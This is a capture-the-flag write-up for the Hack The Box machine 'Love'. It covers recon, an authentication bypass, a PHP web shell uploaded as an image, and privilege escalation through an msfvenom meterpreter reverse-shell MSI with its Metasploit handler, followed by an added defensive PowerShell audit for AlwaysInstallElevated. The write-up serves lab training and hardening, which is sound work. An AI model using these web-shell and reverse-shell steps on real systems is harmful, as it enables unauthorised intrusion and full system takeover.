HTB: Love
- TLDR -

...

Recon:

nmap -sT -sV -v <love ip> leads to the website.

gobuster dir -u <love ip> -w </path/to/wordlist> leads us to "<love ip>/admin/".

Exploit Login & Getting Web Shell:

Using the exploit from Exploit DB, we can bypass the authentication.

Once "logged in", we click on the "voters" tab in the left menu. Click the blue "+" button to add a new user, and upload a PHP web shell as the user's image. Go to <love ip>/images/<name of shell>.php to access the shell.

Getting User:

Get a reverse shell running (I used a PowerShell one-liner), then print the contents of the user file: type C:\Users\Phoebe\Desktop\user.txt.

Getting Admin:

Using some enumeration tool, we discover that the box is able to "install" MSI files as NT AUTHORITY\SYSTEM. Create a reverse shell: msfvenom -p windows/meterpreter/reverse_tcp -f msi lhost=<your ip> lport=3188 > hack.msi, then upload it however you like. The easiest way is to simply "edit" our voter's image by clicking the pencil icon beside our voter's name. Start a meterpreter session: msfconsole; use exploit/multi/handler; set LHOST <your ip>; set LPORT 3188; set PAYLOAD windows/meterpreter/reverse_tcp; exploit. Upload the malicious MSI, then execute it through our current user session.

Once the connection is complete, run shell; powershell to get a PowerShell session, then print the root.txt file: type C:\Users\Administrator\Desktop\root.txt
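
Hardening check for the finding in "Getting Admin" (an added example, not part of the original write-up): MSI files installing as SYSTEM for a standard user is normally the Windows Installer AlwaysInstallElevated policy, which is only active when it is set to 1 in both the machine hive and the user hive. The write-up does not name the setting, so treating it as the cause is an assumption, and the function name Get-AlwaysInstallElevatedStatus is hypothetical.

```powershell
# Added example: audit a host for the Windows Installer
# "AlwaysInstallElevated" policy.
# Assumption: this policy is the setting behind the MSI-as-SYSTEM finding.
# It only takes effect when the value is 1 in BOTH the machine hive and
# the user's hive, so both are read and compared.

function Get-AlwaysInstallElevatedStatus {
    [CmdletBinding()]
    param()

    $sub = 'SOFTWARE\Policies\Microsoft\Windows\Installer'

    # Return the DWORD value, or 0 when the key or the value is absent.
    function Read-Policy([string]$Path) {
        $item = Get-ItemProperty -Path $Path -Name 'AlwaysInstallElevated' -ErrorAction SilentlyContinue
        if ($null -ne $item) { [int]$item.AlwaysInstallElevated } else { 0 }
    }

    $machine = Read-Policy "Registry::HKEY_LOCAL_MACHINE\$sub"

    # Walk every loaded user hive (logged-on users and service accounts),
    # not just the current user; the *_Classes hives are skipped.
    Get-ChildItem -Path 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -notlike '*_Classes' } |
        ForEach-Object {
            $user = Read-Policy "Registry::HKEY_USERS\$($_.PSChildName)\$sub"
            [pscustomobject]@{
                Sid           = $_.PSChildName
                MachinePolicy = $machine
                UserPolicy    = $user
                Elevated      = ($machine -eq 1 -and $user -eq 1)
            }
        }
}

$findings = Get-AlwaysInstallElevatedStatus
$findings | Format-Table -AutoSize

if ($findings | Where-Object Elevated) {
    Write-Warning ('AlwaysInstallElevated is active. Set both values to 0 or remove them ' +
                   '(Group Policy: "Always install with elevated privileges" = Disabled).')
}
```

Run it from an elevated prompt so that all loaded user hives are readable; hives of users who are not logged on are not loaded and are not covered.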



Date created: 2021.08.20